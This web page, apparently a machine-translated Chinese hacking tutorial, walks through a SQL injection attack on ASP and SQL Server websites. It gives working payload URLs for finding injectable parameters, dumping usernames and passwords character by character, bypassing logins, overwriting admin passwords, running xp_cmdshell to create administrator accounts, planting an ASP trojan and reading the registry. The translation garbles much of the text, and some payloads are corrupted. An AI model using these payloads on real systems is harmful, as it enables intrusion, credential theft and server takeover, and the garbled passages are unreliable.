2. Tech
  3. SQL injection attack

SQL injection attack

xiaoxiao2021-03-06  14

SQL injection is accessed from normal WWW port, and the surface looks with the general web page access, there is no difference in web page access, so the current market firewall will not issue an alert to SQL injection. If the administrator does not view the habit of IIS logs, it may be invaded Will not find out for a long time. However, the technique of SQL injection is quite flexible, and there will be many unexpected situations when injected. Can you analyze and construct a smart SQL statement according to the specific situation, thereby successfully acquired the desired data. According to statistics, the website uses ASP Access or SQLServer to account for more than 70%, PHP MySQ accounts for L20%, and there are less than 10% of others. In this article, the principles, methods and processes of SQL injection are illustrated in SQL-Server ASP. (PHP Injection] Another article written by another friend of the NB Alliance Zwell) The overall idea of ​​SQL injection attack is: l Discover the SQL injection position; l Judge the background database type; l Determine XP_cmdshell executable LW Discovery Web virtual directory l Upload an ASP Trojan; l Get administrator privileges; 1. The judgment of SQL injection vulnerability is generally, SQL injection is generally in shape: http://xxx.xxx.xxx/abc.asp? id = xx and other belts In the ASP dynamic web page of the parameter, sometimes there may only be one parameter in a dynamic web page, sometimes there may be n parameters, sometimes integer, sometimes string-type parameters, and cannot be generalized. In short, as long as it is a dynamic web page with parameters and this page accesses the database, it is possible to have SQL injection. If the ASP programmer does not have a safety awareness, there is no possibility of SQL injection without the necessary character filtration. In order to fully understand the information of the dynamic web page answer, please adjust the configuration of the IE. Put the IE-Tool -Internet option - Advanced - Show the Hook out in front of the friendly HTTP error message. In order to clear the problem, the following is analyzed as an example with http://xx.xxx.xxx/abc.asp?p =yy, yy may be integer, or it is possible to be a string. 1. Judgment of integer parameters When the input parameter yy is integrity, the SQL statement in ABC.ASP is generally as follows: SELECT * FROM table name where field = yy, so you can use the following steps to test whether SQL injection exists. 1HTTP: //xxx.xxx.xxx/abc.asp? P = yy '(additional single quotes), at this time, the SQL statement in ABC.ASP turns into the SELECT * FROM table name where field = yy', ABC. ASP operation is abnormal; 2http: //xxx.xxx.xxx/abc.asp? p = yy and 1 = 1, ABC.ASP is running normally, and with http://xx.xxx.xxx/abc.asp?p= YY operation results are the same; 3Http: //xxx.xxx.xxx/abc.asp? P = yy and 1 = 2, abc.asp runs unusual; if the above three is fully met, there must be SQL injection vulnerabilities in ABC.ASP. 2. Judgment of the string type parameters When the input parameter yy is a string, the SQL statement in ABC.ASP is generally as follows: SELECT * FROM table name where field = 'yy', so you can use the following steps to test whether SQL injection is exist.

1HTTP: //xxx.xxx.xxx/abc.asp? P = yy '(additional single quotes), at this time, the SQL statement in ABC.ASP turns into the SELECT * FROM table name where field = yy', ABC. ASP operation is abnormal; 2http: //xxx.xxx.xxx/abc.asp? p = yy and '1' = '1', ABC.ASP is running normally, and with http://xxx.xxx.xxx/ABC. ASP? P = yy running result is the same; 3http: //xxx.xxx.xxx/abc.asp? p = yy and '1' = '2', ABC.ASP runs unusual; if the above three is fully met, ABC. There must be a SQL injection vulnerability in the ASP. 3, the handling of special circumstances Sometimes the ASP programmer will filter out characters such as single quotes in the programmer to prevent SQL injection. At this point you can try it with the following methods. 1 Calculation: Since the VBS is not case sensitive, the programmer is usually all filtering the uppercase string when filtering, or all of the lowercase strings are filtered, and the case in cases often be ignored. If you use Select, you can replace SELECT, SELECT, and 2Unicode: In IIS, internationalization is achieved in Unicode character set, we can completely enter the character entered in IE into the Unicode string for input. Such as =% 2b, space =% 20, etc.; URLENCode information see Annex I; 3ASCII coding method: You can use the input part or all characters to replace the ASCII code, such as u = chr (85), a = chr (97) Wait, ASCII information see Annex II; Second, distinguishing between database server types, Access and SQL-Server are the most commonly used database server, although they all support T-SQL standards, but there are differences, and different databases There are different attack methods, you must take a difference. 1. Use the system variable of the database server to distinguish between SQL-Server has system variables such as USER, DB_NAME (), which can not only determine SQL-Server, but also a large amount of useful information can also be obtained. Such as: 1 http://xxx.xxx.xxx/abc.asp?p=yy and user> 0 not only can determine whether it is SQL-Server, but also get the username of the database to the database 2http: // xxx. xxx.xxx/abc.asp?p =yy and db_name ()> 0 Not only can it be determined whether it is SQL-Server, but also gets the currently used database name; 2. System table using system table Access is MSYSObjects, and There is no access to access in a web environment, and SQL-Server system tables are sysObjects, accessible in a web environment. For the following two statements: 1http: //xxx.xxx.xxx/abc.asp? P = yy and (select count (*) from sysobject> 02http: //xxx.xxx.xxx/abc.asp? P = YY and (Select Count (*) from MsysObjects> 0 If the database is SQL-Serve, then the first, ABC.ASP must run normal, and the second will abnormally; if it is access, both will exceed.

3, MSSQL three key system table SYSDATABASES system table: Each database on Microsoft SQL Server takes a line in the table. When SQL Server is initially installed, sysdatabases contains items of Master, Model, MSDB, MSSQLWeb, and Tempdb databases. This table is only stored in the Master database. This table is saved in the Master database, what information is saved in this table? This is very important. He is saved all the library names, as well as the id and some related information. Here I will list it for everyone for the field name and related instructions we use. Name // indicates the name of the library. DBID / / indicates the ID of the library, DBID from 1 to 5 is system. The five libraries of Master, Model, MSDB, MSSQLWeb, Tempdb are respectively, respectively. Use select * from master.dbo.sysdatabases to check all the library names. SysObjects: In each database of SQL-Server, there is this system table that stores all objects created within the database, such as constraints, defaults, logs, rules, stored procedures, etc., each object occupies a line in the table. The following is the field name and related instructions for this system table. Name, ID, Xtype, Uid, Status: The object name, object ID, object type, user ID, object status of the owner object. Object Type (XTYPE). It can be one of the following object types: c = check constraint D = default or default constraint f = foreign key constraint L = log Fn = scalar function if = embedded table function P = stored procedure pk = primary key constraint (Type Is K) RF = Copy Filter Store S = System Table TF = Table Function TR = Trigger U = User Table UQ = Unique Constraint (Type K) V = View X = Extended Storage When Xtype = 'u' and Status > 0 represents the table established by the user, the object name is the table name, the object ID is the ID value of the table. Use: select * from chouyfd.dbo.sysObjects where xtype = 'u' and status> 0 You can list the table names established in the library chouyfd. Syscolumns: Each of the tables and views occupies a row in the table, and each parameter in the stored procedure also occupies a row in the table. This table is in each database. The main fields are: Name, ID, Colid: Sizes, Table ID, Field ID number, the ID is the ID number that just got to be obtained with sysobjects. Use: Select * from chouyfd.dbo.syscolumns where id = 123456789 Get Chouyfd this library, the ID is a list of all fields in 123456789.

Third, determine XP_cmdshell executable If the account of the current connection data has SA permissions, and the master.dbo.xp_cmdshell extension stored procedure (call this stored procedure can directly use the operating system's shell's shell's shell) can execute correctly, the entire computer can pass the following The method is fully controlled, and all steps in the future can save 1, http: //xxx.xxx.xxx/abc.asp? P = yy and user> 0 ABC.ASP execution exception but you can get the username of the current connection database ( If DBO is displayed, it represents SA). 2, http://xxx.xxx.xxx/abc.asp? P = yy and db_name ()> 0 ABC.ASP performs exception but you can get the currently connected database name. 3, http://xxx.xxx.xxx/abc.asp? P = yy; exec master..xp_cmdshell "net user aaa bbb / add" - (Master is the primary database of SQL-Server; semicolon in the name Indicates that SQL-Server performs the statement name before the total number of divisions, continues to execute the following statement; "-" is an annotation, indicating that all the content behind it is only a comment, and the system does not execute) can directly increase the operating system account AAA, The password is BBB. 4, http://xxx.xxx.xxx/abc.asp? P = yy; exec master..xp_cmdshell "net localgroup administrators aaa / add" - adds the original account AAA to the Administrators group. 5, http://xxx.xxx.xxx/abc.asp? P = yy; backuup Database database name to disk = 'c: /inetpub/wwroot/save.db', back up the resulting data content to the web directory Next, use HTTP to download this file (of course, the preferred choice should know the web virtual directory). 6. Create a Unicode vulnerability http://xxx.xx.xxx/abc.asp?p = ixxx/abc.asp?p = xi; ketpub / scripts /cmd.exe creates a Unicode vulnerability. The control of the entire computer is completed through this vulnerability. 4. Discovery Web virtual directory only finds a web virtual directory, you can determine where ASP Trojans are placed, and User privileges are obtained. There are two ways to be more effective. First, based on experience, it is generally, the web virtual directory is: c: / inetpub / wwwroot; d: / inetpub / wwwroot; E: / INETPUB / WWWROOT, etc., and executable virtual directory is: C: / inetpub / Scripts; D: / INETPUB / SCRIPTS; E: / INETPUB / SCRIPTS, etc.

The second is to traverse the system's directory structure, analyze the results and discover the web virtual directory; first create a temporary table: Temphttp: //xxx.xxx.xxx/abc.asp? P = yy; create table temp (ID nvarchar (255), Num1 nvarchar (255), NUM2 NVARCHAR (255), NUM3 NVARCHAR (255)); - Next: (1) We can use XP_AVAILAMEDIA to get all current drives and store them in the TEMP table: http: // xxx. XXX.XXX /ABC.ASP?p =YY;Insert Temp Exec Master.dbo.xp_availablemedia; - We can get drive lists and related information by querying TEMP content (2) We can use XP_SUBDIRS to obtain subdirectory lists, and Deposit into the TEMP table: http: //xxx.xxx.xxx/abc.asp? P = yy; Insert INTO TEMP (ID) exec master.dbo.xp_subdirs 'c: /'; - (3) We can Using XP_Dirtree to get all subdirectories, inch into the TEMP table: http: //xxx.xxx.xxx/abc.asp? P = yy; Insert INTO TEMP (ID, NUM1) Exec Master.dbo.xp_dirtree 'c: /'; - This can successfully browse to all directories (folder) list: If we need to view the content of a file, you can execute xp_cmdsell: http: //xx.xxx.xxx/ABC .asp? p = yy; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHEC 'TYPE C: /WEB/index.asp'; - Use the 'Bulk Insert' syntax to insert a text file into a temporary table . Such as: Bulk INSERT TEMP (ID) from 'c: /inetpub/wwroot/index.asp' browsing Temp You can see the content of the index.asp file! By analyzing a variety of ASP files, you can get a large number of system information, web construction and management information, and even the connection password for the SA account can be obtained.

Of course, if Xp_cmshell can perform, we can use it to complete: http: //xxx.xxx.xxx/abc.asp? P = yy; Insert INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHELL 'DIR C: /' ; --Http: //xxx.xxx.xxx/abc.asp? P = yy; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHELL 'DIR C: / * .ASP / S / A'; XP_cmdshell We can see all what you want to see, including w3svchttp: //xxx.xxx.xxx/abc.asp? p = yy; Insert Into Temp (ID) exec master.dbo.xp_cmdshell 'CScript C: / inetpub / adminsscripts /adsutil.vbs enum w3svc ', but if not SA permission, we can also use http://xx.xxx.xxx/abc.asp?p =yy; all) exec master.dbo.xp_dirtree 'c: /'; Note: 1, after each of the above browsing, you should delete all the contents in the TEMP, the deletion method is: http: //xxx.xxx.xxx/abc.asp? p = yy; Delete from Temp; - 2, browse the TEMP table method is: (Suppose TestDB is the current connection database name) http://xxx.xxx.xxx/abc.asp?p=yy and (SELECT TOP 1 id from testdb .dbo.temp)> 0 Get the value of the first record ID field in TEMP, and compare with integers, obviously ABC.ASP works exception, but can discover the value of the ID field in an exception. Suppose the table name of the discovery is XYZ, then http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 id from testdb.dbo.temp)> 0 Where id not in ('xyz') )> 0 Get the value of the second record ID field in the table TEMP. 5. Upload ASP Trojan's so-called ASP Trojan, is an ASP code with special functions, and put it under the Scripts of the web virtual directory, remote customers can perform it through IE, and then get the system's USER rights, implement preliminary control of the system. . Uploading ASP Trojans generally have two more effective methods: 1. Using the web site remote management function, for maintenance, it provides remote management features; there are also many Web sites, its content is for different users. Have different access rights. In order to achieve the control of the user's rights, there is a web page, requiring the username and password, only the correct value is entered, can be used to perform the next operation, can implement the Web management, such as uploading, downloading files, directory browsing, modifying Configuration, etc. Therefore, if you get the correct username and password, you can upload an ASP Trojan, but sometimes you can directly get the USER rights and browse the system, the previous "Discovery Web Virtual Directory" complex operation can be omitted. Username and password are typically stored in a table, discovering this table and resolving issues. Two effective methods are given below.

A, Injection: In theory, the authentication web page will have a type: select * from admin where username = 'xxx' and password = 'yyy' statement, if the necessary characters are not performed before it is officially running this sentence Filtering, it is easy to implement SQL injection. Enter: ABC 'or 1 = 1 - In the user name text box: 123 SQL statement becomes: select * from admin where username =' abc 'or 1 = 1 and password =' ​​123 ' Regardless of the user to enter any username and password, this statement will always be executed correctly, and the user easily deceives the system and obtain legal identity. B, guess: Basic ideas are: guess all database names, guess each table name in the library, the analysis may be the name of the username and password, guess each field name in the table, guess the table Each recording content in the middle. l Guess all database name http://xx.xxx.xxx/abc.asp?p =yy and (select count (*) from master.dbo.sysdatabases where name> 1 and dbid = 6) <> 0 because DBID The value ranges from 1 to 5, which is the system. So the user's own built must start from 6. And we submit Name> 1 (Name field is a characteristic field and digital comparison will be wrong), ABC.ASP works exception, you can get the first database name, and change DBID to 7, 8, 9, 10, 11, 12 ... You can get all database names. The following assumptions the obtained database name is TestDB. l Guely guess the name of the user's name table in the database, this method is based on personal experience. In general, User, User, Member, Members, UserList, Memberlist, Userinfo, Manager, Admin, Admin, Systemuser, Systemusers , sysuser, sysusers, sysaccounts, systemaccounts, etc. And judges by statement http://xx.xxx.xxx/abc.asp?p=yy and (select count (*) from testdb.dbo. Table name)> 0 If the table name exists, ABC.ASP works fine Otherwise it will. This is cycled until the name of the system account table is guess. Reading method: SQL-Server has a table sysObjects that store system core information. All tables, view and other information are all stored in this table, and this table can be accessed via the web. When Xtype = 'u' and status> 0 represents the table established by the user, discover and analyze the table and name of each user, you can get the name of the username, the basic implementation method is: 1Http: //xxx.xxx .xxx / abc.asp? p = yy and (select top 1 name from testdb.dbo.sysObjects where xtype = 'u' and status> 0)> 0 Get the name of the first user established table and compares with integers Obviously ABC.ASP works exception, but can find the name of the table in an exception.

Suppose the table name of the discovery is XYZ, then 2http: //xxx.xxx.xxx/abc.asp? P = yy and (select top 1 name from testdb.dbo.sysObjects where xtype = 'u' and status> 0 and name NOT IN ('XYZ'))> 0 You can get the name of the table established by the second user, which can get the name of the created table. According to the name of the table, you can usually determine the table user to store the username and password. The following assumptions this table name is admin. l Guess the username and password field name The admin table must have a username field in the admin table, and there must be a password field. Only the names of this two fields are available. How to get their name, the same method is equally below. Treatment: This method is based on personal experience guessing the word name. Generally, the name of the username is often used: UserName, Name, User, Account, etc. The name of the password field is common: Password, Pass, PWD, Passwd, etc. And judges by statement http://xx.xxx.xxx/abc.asp?p=yy and (Select Count "from testdb.dbo.admin)> 0" SELECT Count "from the" SELECT COUNT " The statement gets the number of rows of the table, so if the field name exists, ABC.ASP works fine, otherwise it will. This is cycled until you guess the names of the two fields. Reading method: Basic implementation method is http://xxx.xxx.xxx/abc.asp?p =yy and (select TOP 1 col_name (Object_ID ('admin ", 1) from testdb.dbo.sysObjects> 0. SELECT TOP 1 Col_Name (Object_ID ('admin ", 1) from testdb.dbo.sysObjects is the first field name of the known table name from sysObjects, compared with integers, obviously abc.asp work exception, but Once the abnormality can find the name of the field. All field names can be obtained in sections 1, 3, 4, 5, 6 ... l Conjecting the username and password The most common use of the user name and password is also the most efficient method: ASCII code verbal decoding method: Although this method is slower, it must be feasible. The basic idea is to guess the length of the field, and then guess the value of each bit. Guess the user name is the same as the guess code. The following is the following to guess the username as an example. Http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 len (username) from testdb.dbo.admin) = x (x = 1, 2, 3, 4, 5, ... N Username is the name of the username, and the name of the application is the name of the table. When X is a certain value i and the ABC.ASP is running normally, I is the length of the first username.

Such as: When entering http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 len (username) from testdb.dbo.admin) = 8, first ABC.ASP is running normally, then first The length of the user name is 8 http: //xxx.xxx.xxx/abc.asp? P = yy and (Substring (Username, M, 1)) from testdb.dbo.admin) = n (M The value is between 1 to the previous step, when M = 1, 2, 3, ... when speculative, speculation, the value of the first, 2, 3, ...); N is 1 ~ 9, a ~ Z, A ~ Z ASCII value, that is, any value between 1 to 128; admin is the name of the system user account table), if n is a certain value i and ABC.ASP is running normally, i corresponds to the ASCII code It is a certain value of the username. Such as: When entering http://xxx.xxx.xxx/abc.asp?p=yy and (Substring (Username, 3, 1)) from testdb.dbo.admin) = 80 ABC.ASP Operating is normal, the third bit of the username is P (the ASCII 80); http://xx.xxx.xxx/abc.asp? P = yy and (Substring (Username, 9, 1))) = 33 When ABC.ASP is running normally, the 9th bit of the username is! (ASCII is 80); guesses the first username and password, the same, You can guess all other user names and passwords. Note: Sometimes the password that may be encrypted by MD5, but also needs to be detached with a special tool. Or change your password first, then change it, see below. Simple method: guess the user name http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 flag from testdb.dbo.admin where username> 1), FLAG is a field in the admin table UserName is the username field, at which time ABC.ASP works exception, but can get the value of UserName. Similar methods, you can get the second user name, the third user, etc. until all usernames in the table. Guess user password: http://xxx.xxx.xxx/abc.asp? P = yy and (select top 1 flag from testdb.dbo.admin where pwd> 1), Flag is a field in the admin table, PWD is Password field, at this time, ABC.ASP works exception, but can get the value of the PWD. Similarly to the same method, you can get the password of the second user name, the password of the third user, etc., until the password of all users in the table. The password is sometimes encrypted by MD5 and can be changed. Http://xxx.xxx.xxx/abc.asp?p=yy;update testdb.dbo.admin set pwd = 'A0B923820DCC509A' Where username = 'www'; - (1 MD5 value is: AaabbbccdDdeeef, ie The password is changed to 1; WWW is known as the known username), of course, can certainly change the password. 2. Use the table content to guide the file function SQL has a BCP command, which can convert the contents of the table into the text file and put it in the specified location.

With this feature, we can build a temporary table first, then enter an ASP Trojan in a row in a row, then export the ASP file with the BCP command. The command line format is as follows: BCP "Select * from text..foo" Queryout c: /inetpub/wwroot/runcommand.asp -c -s localhost -u sa -p foobar ('s' parameter is the server executing the query,' U 'The parameter is the username,' P 'parameter is a password, and finally uploaded a Runcommand.asp Trojan). Administrator privileges. How to do? There are many ways to upgrade permissions: uploading Trojans, modify the boot automatically run. Ini file (it is open, it is dead); copy cmd.exe to Scripts, people create Unicode vulnerability; download SAM files, crack and get OS All username passwords;, etc., depending on the specific situation of the system, different methods can be taken. Seven, some special means of SQL-SERVER 1, extended the use of stored procedures to modify the registry xp_regread [xp_regread] Another useful function is a built-in storage procedure set xp_regXXXX class (Xp_regaddmultistring, Xp_regdeletekey, Xp_regdeletevalue, Xp_regenumkeys, Xp_regenumvalues, Xp_regread, Xp_regremovemultistring, XP_RegWrite). An attacker can use these functions to modify the registry, such as reading the SAM value, allowing an empty connection, automatic running procedure, etc. Such as: exec XP_regread hkey_local_machine, 'system / currentcontrolset / services / lantserver / parameters', 'nullsessionshares' determines what kind of session connection is available in the server. EXEC XP_REGENUMVALUES HKEY_LOCAL_MACHINE, 'System / CurrentControlSet / Services / SNMP / Parameters / ValidCommunities' Display All SNMP community configurations on the server, with this information, the attacker may reconfigure network devices in the same network. 2. Use other stored procedures to change the server XP_ServiceControl procedure to allow users to start, stop service.

Such as: (exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server') Xp_availablemedia display useful Xp_dirtree drive machine allows to obtain a tree Xp_enumdsn include ODBC data source on the server Xp_loginconfig Get server security information XP_makecab allows the user to create a compressed file XP_ntsec_enumdomains on the server to enumerate the process ID of the server that the server can enter, and terminate this process attachment 1: URLUNICODE table (EFC1738) Character, RFC1738) Character Special character Meaning URL encoding # Used to mark specific document position% 23% to encode% 25 & Separate different variable values ​​to% 26 in variable value 2B /% 5c = Used to connect key and value% 3D? Representation of the start% 3F space% of the query string. Junity% 2e: colon% 3A Annex II: ASCII table (8) DEC HEX Char Dec HEX CHAR 80 50 P 32 20 (Space) 81 51 Q 33 21 "82 52 R 34 22" 83 53 S 35 23 # 84 54 T 36 24 $ Content $ NBSP; 85 55 U 37 25% 86 56 V 38 26 & 87 57 W 39 27 '88 58 x 40 28 (89 59 y 41 29) 90 5A Z 42 2A * 91 5B [43 2B 92 5C / 44 2C, 93 5D] 45 2D - 94 5E ^ 46 2E. 95 5F _ 47 2F / 96 60`

转载请注明原文地址:https://www.9cbs.com/read-50055.html

9cbs

New Post(0)